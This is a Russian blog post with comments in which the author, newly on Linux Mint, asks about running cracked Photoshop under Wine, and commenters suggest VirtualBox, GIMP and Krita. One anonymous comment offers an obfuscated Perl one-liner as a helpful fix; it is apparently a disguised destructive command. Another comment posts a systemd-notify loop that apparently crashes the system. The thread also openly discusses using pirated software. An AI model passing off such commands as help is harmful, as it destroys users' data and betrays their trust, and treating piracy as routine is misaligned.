Войти в систему

Home
    - Создать дневник
    - Написать в дневник
       - Подробный режим

LJ.Rossia.org
    - Новости сайта
    - Общие настройки
    - Sitemap
    - Оплата
    - ljr-fif

Редактировать...
    - Настройки
    - Список друзей
    - Дневник
    - Картинки
    - Пароль
    - Вид дневника

Сообщества

Настроить S2

Помощь
    - Забыли пароль?
    - FAQ
    - Тех. поддержка



Пишет curlysue ([info]curlysue)
@ 2016-10-03 11:52:00


Previous Entry  Add to memories!  Tell a Friend!  Next Entry
а я перешла на линукс, вот так-то
Линукс Минт очень хороший. А Гимп супротив Фотошопа это как плотник супротив столяра. Говоря откровенно, это просто какой-то позор.

Отсюда вопрос. Я вообще изначально хотела установить вайн и работать в ФШ под вайном. Но почему-то все кто пользовался говорят "ни в коем случае не запускайте под вайном хакнутую версию ФШ". И не объясняют почему. Ищу инфу, не нахожу. Если у кого-то есть объяснение, буду признательна. Потому что я конечно побаиваюсь включать мой ФШ в вайне если все как один говорят что это нельзя делать (и не объясняют почему, козлы).

А вообще я чего думаю. Если вся проблема почему ФШ не работает в Линуксе, это неоткрытый какой-то там порт, так может его открыть? Ну я понимаю что дело не минутное но разве это не проще чем возиться с вайном?


(Добавить комментарий)

попробуйте в консоли прописать. мне помогло
(Анонимно)
2016-10-03 13:57 (ссылка)

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

(Ответить) (Ветвь дискуссии)

Re: попробуйте в консоли прописать. мне помогло
[info]curlysue
2016-10-03 14:04 (ссылка)
Иди, деточка, купи себе мороженого.

(Ответить) (Уровень выше) (Ветвь дискуссии)

Тог
[info]dorkavla
2016-10-03 15:29 (ссылка)
да так
while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done

(Ответить) (Уровень выше)

Re: попробуйте в консоли прописать. мне помогло
[info]tristes_tigres
2016-10-03 15:11 (ссылка)
Анон-унылое гавно, даже сам не осилил перл, чтобы написать бяку, а тупо скопипастил с любимого сайта тупой школоты.

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: попробуйте в консоли прописать. мне помогло
(Анонимно)
2016-10-03 17:08 (ссылка)
Соси, пидао!

(Ответить) (Уровень выше)


[info]tiphareth
2016-10-03 14:11 (ссылка)
не вижу, почему бы не запускать в Вайне Фотошоп
единственно - там не все версии, похоже, работают
https://appdb.winehq.org/objectManager.php?sClass=application&iId=17

(Ответить) (Ветвь дискуссии)


[info]curlysue
2016-10-03 14:21 (ссылка)
Это-то я первым делом посмотрела :) Там еще отзывы есть (на этом сайте вайна), и еще всякие туториалы в сети. И везде все говорят одно и то же - не запускайте хакнутую версию. А у меня другой нет (и не будет, фак Адоб). Вот хочу понять, 1) почему 2) может, все-таки можно и 3) стоит ли вкладываться своим временем и силами в переход на Гимп который ну блять унылое говно. Хотя в стратегической перспективе переключиться полностью на опен сурс это разумно. Но мне ж и работать надо. Поэтому вот хочу понять, что вайн делает такого, из-за чего нельзя запускать краденый ФШ. И сделать вывод, все-таки можно или нет.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]lorp
2016-10-03 14:34 (ссылка)
вариант узнать - запустить пиратку под вайном. если что потом, то все полечить можно переустановкой.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]double_agent
2016-10-03 14:39 (ссылка)
А вдруг омоновцы в дверь постучат? Т.е. не амоновцы, а guardia civil.

(Вообще ничего не поняла из поста, но решила поучаствовать в обсуждении).

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]anon75448
2016-10-03 15:15 (ссылка)
с точки зрения guardia civil совершенно безразлично, как запущен фотошоп - под виндой или под linux/wine.

(Ответить) (Уровень выше)


[info]curlysue
2016-10-03 15:36 (ссылка)
Вот! в корень зришь!

(Ответить) (Уровень выше)


[info]tiphareth
2016-10-03 14:43 (ссылка)
я перешел на гимп
поначалу непривычно, потом втянулся
сейчас мне с гимпом удобнее

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pizelks
2016-10-03 15:37 (ссылка)
Как ни странно он намного удобнее ФШ. Просто ФШ индустриальный стандарт. Если не заниматься пре-прессом и прочей мудянкой, то гимп - однозначно лучше и логичнее.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]curlysue
2016-10-03 15:39 (ссылка)
Именно прочей мудянкой я и занимаюсь.

(Ответить) (Уровень выше)


[info]tristes_tigres
2016-10-03 15:03 (ссылка)
Если подойдет старая версия фотошопа, на сайте адоба выложен дистрибутив и ключи. Второй способ - запускать под виртуальной машиной типа virtualbox или quemu-kvm (есл ноут не совсем слабенький). Для этого, правда, нужен еще дистрибудив виндовс.

В любом случае, с потерей линукс-девственности вас, Курлисью.

(Ответить) (Ветвь дискуссии)


(Анонимно)
2016-10-03 15:15 (ссылка)
удваиваю этого трапца, по вайном фш я не осилил, зато в виртуалбоксе (который в минте вроде как изкоробки) фш идёт

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]curlysue
2016-10-03 15:38 (ссылка)
Я удалила виндоус, у меня нет дистро. Есть правда краденая виста, но я не уверена что СС 14 будет на ней работать. Той висте лет десять уже скоро (пытаюсь вспомнить когда она была выпущена).

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]curlysue
2016-10-03 15:48 (ссылка)
Да, лет десять есть. А ФШ 2014 года. Не уверена, что он будет под ней бегать. А я люблю чтоб бегало.

(Ответить) (Уровень выше)


[info]steinkrauz
2016-10-04 00:04 (ссылка)
> нет дистро
Качается с оф.сайта или с бухты

Далее
https://www.youtube.com/watch?v=F7lE4x-HRMA

(Ответить) (Уровень выше)


(Анонимно)
2016-10-03 15:48 (ссылка)
по моему лучше привыкнуть к джимпу (если вы не супрепрофессионал а только привыкли к паре-тройке функций - можно их переосвоить)

(Ответить) (Ветвь дискуссии)


[info]curlysue
2016-10-03 15:48 (ссылка)
(плачу)

Я суперпрофессионал.

(Ответить) (Уровень выше) (Ветвь дискуссии)


(Анонимно)
2016-10-03 16:17 (ссылка)
минт кстати может доставить проблем тоже. В среднем он больше разрекламирован и наименее стабилен. Косыреву можете спросить.
https://pixlr.com/editor/

(Ответить) (Уровень выше)


(Анонимно)
2016-10-03 16:39 (ссылка)
Эмммм.
А почему было не задать эти вопросы ДО того как херить винду?

ДА

(Ответить) (Уровень выше) (Ветвь дискуссии)


(Анонимно)
2016-10-03 16:47 (ссылка)
вайн хорошее решение для небольших приложений, либо приложений которые сделаны портабельными в виндоус.
лучше все таки потратиться и найти ISO винды (например 7) и использовать виртуалбокс. В данном случае нет разницы вообще - плюсы отовсюду

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]curlysue
2016-10-03 17:05 (ссылка)
Я склонна с вами согласиться. Осталось выяснить, будет ли работать СС 14 под старенькой краденой вистой (уже один раз установленной). Боюсь что кроме как опытным путем это выяснить не получится.

(Ответить) (Уровень выше)


[info]curlysue
2016-10-03 17:04 (ссылка)
Потому что винда при очередном обновлении установила мне погоду, причем так, что ее нельзя было деинсталлировать. И установила не куда-нибудь, а поверх календаря, и сдвинуть значок погоды было нельзя. А погода мне не нужна, а календарь нужен. И после того как я не смогла удалить погоду, я взбесилась и удалила винду.

Ну потому что нельзя до такой степени пользователю в рожу плевать. Это все, что я могу сказать в свое оправдание.

(Ответить) (Уровень выше) (Ветвь дискуссии)


(Анонимно)
2016-10-03 22:40 (ссылка)
а чем для календаря кстати пользуешься в линуксе?
неужели трушные conky?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]curlysue
2016-10-03 23:29 (ссылка)
А просто на время нажимаю и появляется календарь. Очень удобно.

(Ответить) (Уровень выше)


[info]sk_101
2016-10-03 17:54 (ссылка)
как вариант http://www.pclosmag.com/html/Issues/201309/page15.html

только надо быть внимательным с 90 day time limit

например делать так:

So, to remove any ambiguities in the above statement, make a snapshot of your Windows virtual machine right after you install it and any programs you are planning to run. If you are getting close to the 90 day time limit, secure your files (copy them over to your host PCLinuxOS system by setting up some shared folders). Then, first clone your snapshot, then work off of the snapshot copy. This way, you will always have a pristine copy of your Windows virtual machine stored as a snapshot.

а вообще, чем конкретно гимп не устраивает?

(Ответить) (Ветвь дискуссии)


[info]curlysue
2016-10-03 18:54 (ссылка)
Вот это да! (это я про релиз всех версий виндоуз). Этим надо воспользоваться. Спасибо.

Гимп чем не устраивает. Ну. Понимаете, это не интерфейс. Во всяком случае, это не интерфейс для постоянной работы. Может быть, вот как выше сказали, для окказионально зайти, подправить какую-нибудь картинку или там я не знаю какой-нибудь простой сайт замокапить он может быть ок. Но для постоянной работы это не интерфейс. Пока это основная претензия. Я еще толком не пробовала большинство функций. Честно говоря, я туда захожу, делаю фэйспалм и выхожу.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]do_
2016-10-04 03:49 (ссылка)
Галочку "Открывать всё в одном окне" не пробовали ещё?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]curlysue
2016-10-04 19:59 (ссылка)
Спасибо за подсказку, теперь пробовала. Ну лучше конечно. Вот что меня изумило (помимо прочего), так это то, что шорткаты не совпадают с фотошопными. По-моему, это настолько очевидно, что шорткаты в программах одного функционала должны быть одинаковыми. Или это только мне очевидно, черт его знает. Ну в общем, все для вашего удобства, как я это называю.

Ну ничего, вожусь, осваиваю. Параллельно размышляю над тем как организовать работу в виртбоксе.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]curlysue
2016-10-04 20:40 (ссылка)
Отдельно доставляет, что офиц. туториалы Гимпа сделаны белым шрифтом на черном фоне. Сразу видно, профессионалы делали. (Машу рукой безнадежно.)

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]sk_101
2016-10-11 22:24 (ссылка)
Што?

(Ответить) (Уровень выше)


[info]grusha
2016-11-11 17:46 (ссылка)
Шорткаты это часть функционала. Очевидно, у разработчиков разных программ бывает разное видение того, какие шорткаты удобнее.
Для стандартизации чего бы то ни было нужны предпосылки, а их в данном случае нет, вот и все.

(Ответить) (Уровень выше)


[info]anti_myth
2016-10-03 21:58 (ссылка)
Есть еще Krita:
https://www.opennet.ru/openforum/vsluhforumID3/109063.html#57

(Ответить) (Ветвь дискуссии)


(Анонимно)
2016-10-03 22:21 (ссылка)
Так потыкал навскидку - неплохо. Спасибо глиномёсов.
Но абсолютно у всех линуксов графических редакторов есть существенный недостаток.
Они не умеют в текст .psd
Следовательно для вёрстки css не подходят (хз правда для чего графредактор кудряшке)

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]curlysue
2016-10-03 23:27 (ссылка)
Да. Это один из их существенных недостатков.

(Ответить) (Уровень выше)